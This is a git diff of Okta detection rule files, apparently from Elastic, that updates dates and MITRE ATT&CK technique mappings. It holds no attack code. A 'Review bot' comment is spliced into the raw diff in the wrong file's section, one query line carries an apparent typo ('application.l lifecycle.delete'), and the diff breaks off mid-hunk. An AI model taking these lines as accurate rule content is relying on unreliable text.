--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -87,19 +87,23 @@ event.dataset:okta.system and event.action:(zone.update or network_zone.rule.dis
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml
index 2be46aca15c..e2e4e61c60e 100644
--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -76,19 +76,28 @@ event.dataset:okta.system and event.action:policy.lifecycle.update
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml
index b163bbcf480..72e4c5ff146 100644
--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -85,19 +85,23 @@ event.dataset:okta.system and event.action:policy.rule.update
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.007"
 name = "Disable or Modify Cloud Firewall"
 reference = "https://attack.mitre.org/techniques/T1562/007/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml
index 8c9739a98ea..3dba3d705cc 100644
--- a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml
+++ b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/19"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic", "@BenB196", "Austin Songer"]
@@ -82,41 +82,57 @@ event.dataset:okta.system and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [rule.threshold]
 field = ["okta.actor.alternate_id"]
 value = 5
diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
index 121e67e54ef..86fc7707a90 100644
--- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
+++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -78,14 +78,31 @@ event.dataset:okta.system and event.action:application.lifecycle.deactivate
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1489"
 name = "Service Stop"
 reference = "https://attack.mitre.org/techniques/T1489/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml
index ade1997e494..0735762b208 100644
--- a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml
+++ b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -84,14 +84,31 @@ event.dataset:okta.system and event.action:application.l lifecycle.delete
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1489"
 name = "Service Stop"
 reference = "https://attack.mitre.org/techniques/T1489/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
index 79b6707bfb6..f630bd79c29 100644
--- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
+++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -91,3 +91,15 @@ id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/impact_possible_okta_dos_attack.toml b/rules/integrations/okta/impact_possible_okta_dos_attack.toml
index 52c88d548de..91960faaa25 100644
--- a/rules/integrations/okta/impact_possible_okta_dos_attack.toml
+++ b/rules/integrations/okta/impact_possible_okta_dos_attack.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -78,6 +78,7 @@ event.dataset:okta.system and event.action:(application.integration.rate_limit_e
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1498"
 name = "Network Denial of Service"
@@ -88,9 +89,17 @@ id = "T1499"
 name = "Endpoint Denial of Service"
 reference = "https://attack.mitre.org/techniques/T1499/"
+[[rule.threat.technique.subtechnique]]
+id = "T1499.002"
+name = "Service Exhaustion Flood"
+reference = "https://attack.mitre.org/techniques/T1499/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1499.003"
+name = "Application Exhaustion Flood"
+reference = "https://attack.mitre.org/techniques/T1499/003/"
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml
index 10d46662b9a..a533da4badf 100644
--- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml
+++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/07"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -75,17 +75,44 @@ event.dataset:okta.system and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
 [[rule.threat.technique]]
 id = "T1133"
 name = "External Remote Services"
 reference = "https://attack.mitre.org/techniques/T1133/"
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["okta.actor.id", "cloud.account.id"]
diff --git a/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml b/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml
index 286487e6a10..80b6b71f2ba 100644
--- a/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml
+++ b/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/05/07"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Austin Songer"]
@@ -82,14 +82,18 @@ event.dataset:okta.system and event.category:authentication and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
+[[rule.threat.technique.subtechnique]]
+id = "T1566.002"
+name = "Spearphishing Link"
+reference = "https://attack.mitre.org/techniques/T1566/002/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml
index d157ea4686f..ce13789eee4 100644
--- a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml
+++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/14"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -76,16 +76,22 @@ event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
@@ -93,6 +99,7 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
@@ -100,6 +107,7 @@ framework = "MITRE ATT&CK"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
@@ -107,4 +115,3 @@ framework = "MITRE ATT&CK"
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
index 3980b66a6b4..afd4246e872 100644
--- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
+++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/01/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -111,14 +111,36 @@ value = "now-5d"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1199"
 name = "Trusted Relationship"
 reference = "https://attack.mitre.org/techniques/T1199/"
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
index 2a87b962d34..100a80ef79b 100644
--- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
+++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/10/07"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -78,17 +78,39 @@ event.dataset: "okta.system"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["client.user.name", "okta.client.user_agent.raw_user_agent"]
diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml
index 3cee4601d83..5e724854e3d 100644
--- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml
+++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -80,50 +80,13 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
index fdf12c3e90b..a651b18fce8 100644
--- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
+++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/07"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -87,22 +87,39 @@ event.dataset:okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1550.004"
 name = "Web Session Cookie"
 reference = "https://attack.mitre.org/techniques/T1550/004/"
-
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.004"
+name = "Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1550/004/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.threshold]
 field = ["okta.actor.id"]
 value = 1
diff --git a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml
index 859394bc1c4..2d50aeeea9a 100644
--- a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml
+++ b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -86,14 +86,31 @@ event.dataset:okta.system and event.action:group.privilege.grant
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml
index 4e3bb956cee..ae9abcc159f 100644
--- a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml
+++ b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/02/03"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
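Review bot: The Persistence entry at the top of this hunk keeps `T1098` with no sub-technique, while the new Privilege Escalation entry below maps the same group-privilege grant to `T1098` plus `T1098.003`, and the sibling administrator-role hunk that follows adds `T1098.003` to both of its entries, so the asymmetry here reads as an oversight rather than a deliberate choice. If it is unintended, add a `[[rule.threat.technique.subtechnique]]` table with `id = "T1098.003"`, `name = "Additional Cloud Roles"` and the `/techniques/T1098/003/` reference after the Persistence entry's `reference = "https://attack.mitre.org/techniques/T1098/"` line, mirroring the block added lower in the hunk. The `[rule]` table this threat list belongs to starts outside the hunk.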
@@ -92,14 +92,36 @@ event.dataset:okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml
index 3d49244c971..110fba31686 100644
--- a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml
+++ b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -85,14 +85,23 @@ event.dataset:okta.system and event.action:system.api_token.create
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
 reference = "https://attack.mitre.org/techniques/T1136/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml b/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml
index 399af2398c6..7b826d1c120 100644
--- a/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml
+++ b/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -86,14 +86,31 @@ event.dataset:okta.system and event.action:user.mfa.factor.reset_all
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
+reference = "https://attack.mitre.org/techniques/T1556/006/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
index 3f356b7f3ee..04ca3459ae7 100644
--- a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
+++ b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/20"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/09/08"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -85,19 +85,36 @@ sequence by okta.target.id with maxspan=12h
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1556.006"
 name = "Multi-Factor Authentication"
 reference = "https://attack.mitre.org/techniques/T1556/006/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
+reference = "https://attack.mitre.org/techniques/T1556/006/"
+
+[rule.threat.tactic]
+id = "TA0005"
